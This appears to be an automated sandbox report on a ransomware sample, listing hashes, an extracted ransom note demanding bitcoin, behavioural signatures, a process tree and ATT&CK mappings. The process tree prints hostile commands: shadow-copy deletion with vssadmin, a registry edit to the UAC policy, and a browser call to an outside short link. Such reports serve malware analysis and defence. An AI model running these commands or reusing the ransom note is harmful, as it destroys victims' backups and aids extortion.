Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    30-10-2020 05:07

General

  • Target

    6.exe_.exe

  • Size

    26KB

  • MD5

    0f0d5631cc8749e8a8a2f61ca909dcfc

  • SHA1

    ee79e938a80d1d0a955899f56d5f8f37bee38de0

  • SHA256

    e404f26379df9df89844dbd55120dccf383c3b793e0f08d84ee40f82d0cc334a

  • SHA512

    5b1560a5029155519af379cf9d0cce82a0d96fe7fb6af3888310a83fd45ac32ee9dd110f43721cd2313cb33fee9739bf86470b3083c5c4b75a74837a19bc0b0c

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\HELP_DECRYPT_YOUR_FILES.txt

Ransom Note
Oops All Of your important files were encrypted Like document pictures videos etc.. Don't worry, you can return all your files! All your files, documents, photos, databases and other important files are encrypted by a strong encryption. How to recover files? RSA is a asymmetric cryptographic algorithm, you need one key for encryption and one key for decryption so you need private key to recover your files. It’s not possible to recover your files without private key. The only method of recovering files is to purchase an unique private key.Only we can give you this key and only we can recover your files. What guarantees you have? As evidence, you can send us 1 file to decrypt by email We will send you a recovery file Prove that we can decrypt your file Please You must follow these steps carefully to decrypt your files: Send $200 worth of bitcoin to wallet: 3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq after payment,we will send you Decryptor software contact email: bondbond1@protonmail.com Your personal ID: d09TwldPIleGCR2Y1zdbtIoE64jLQTrKMQfIhztxUqd4j3PCaIGCeNqrxj1ZBQa/MZd+ProqyE6NQmq7tOfrl4EtnfZn+5catCOgp8Rnohnq97ELsWjoUTXPdLejXeSbPOBXp804zv6pJuLtvO1LAfJ0qm1lMFCur0R9JSttCbA=
Emails

bondbond1@protonmail.com

Wallets

3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Modifies service 2 TTPs 5 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6.exe_.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"
    1⤵
    • Modifies extensions of user files
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:2000
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1292
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c vssadmin.exe delete shadows /all /quiet
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1712
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe delete shadows /all /quiet
        3⤵
        • Interacts with shadow copies
        PID:1560
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://2no.co/1SHYt7
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:760
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1956

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Persistence
    Modify Existing Service (1) T1031
  • Privilege Escalation
    Bypass User Account Control (1) T1088
  • Defense Evasion
    Bypass User Account Control (1) T1088
    Disabling Security Tools (1) T1089
    Modify Registry (4) T1112
    File Deletion (2) T1107
  • Command and Control
    Web Service (1) T1102
  • Impact
    Inhibit System Recovery (2) T1490

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    191719adfa0a348195c83103586b5905

    SHA1

    fbc775b9f645124b1dd37f1eab7087b1a5d0bf57

    SHA256

    ee4b7ef74bf224d4d0cb065ce94d9dddb574f70e7afb3aaf5bf4b7bf53c0a983

    SHA512

    9bdc8de49869b23e64aa2867207d5dda36a1b714c8b0b1647411e57cfe485414685b1a120a7ea73a71e230384b3fdc25282edf6d370011312a528460815082de

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\s7iy1jn\imagestore.dat
    MD5

    c61cd898b477ed17e75cec6f6471813d

    SHA1

    40011d808c0282ce8adb9e2c6c6e831aa3bbc67b

    SHA256

    af4dadc1cfc2f4db490ec7b66e36587b18ad3e7ac2582f336dac91127d3c54c9

    SHA512

    ab9541be776005fd270ac71ab1cc4bbc9dbed1e5c5db35b0dfefae43dd3439c0595271da5aad2323c630fe6749a2397a3649194a49f8d79a7c0ba39c996a847d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CWT9VBTE.txt
    MD5

    71c3c45b5899fd410c5af50a95735b92

    SHA1

    efe186d8d83d2897ac966a08724ea5ac9b59f84c

    SHA256

    658f10e1f39a02f3a715d3b50af114088cd85d4129de05dbc253bf31cb7a1300

    SHA512

    241eeb763a3af9f0745f09eab158870b44e13a8a4f58a86d76ccbbe516419557c4e3315f00973294cd1a92e3f3139f53fb30ff65836fe9dae75d2d1ff339434c

  • memory/760-11-0x0000000000000000-mapping.dmp
  • memory/848-9-0x0000000000000000-mapping.dmp
  • memory/900-10-0x000007FEF5350000-0x000007FEF55CA000-memory.dmp
    Filesize

    2.5MB

  • memory/1028-4-0x0000000000000000-mapping.dmp
  • memory/1168-3-0x0000000000000000-mapping.dmp
  • memory/1292-5-0x0000000000000000-mapping.dmp
  • memory/1560-8-0x0000000000000000-mapping.dmp
  • memory/1688-0-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp
    Filesize

    9.9MB

  • memory/1688-1-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
    Filesize

    4KB

  • memory/1712-7-0x0000000000000000-mapping.dmp
  • memory/2000-6-0x0000000000000000-mapping.dmp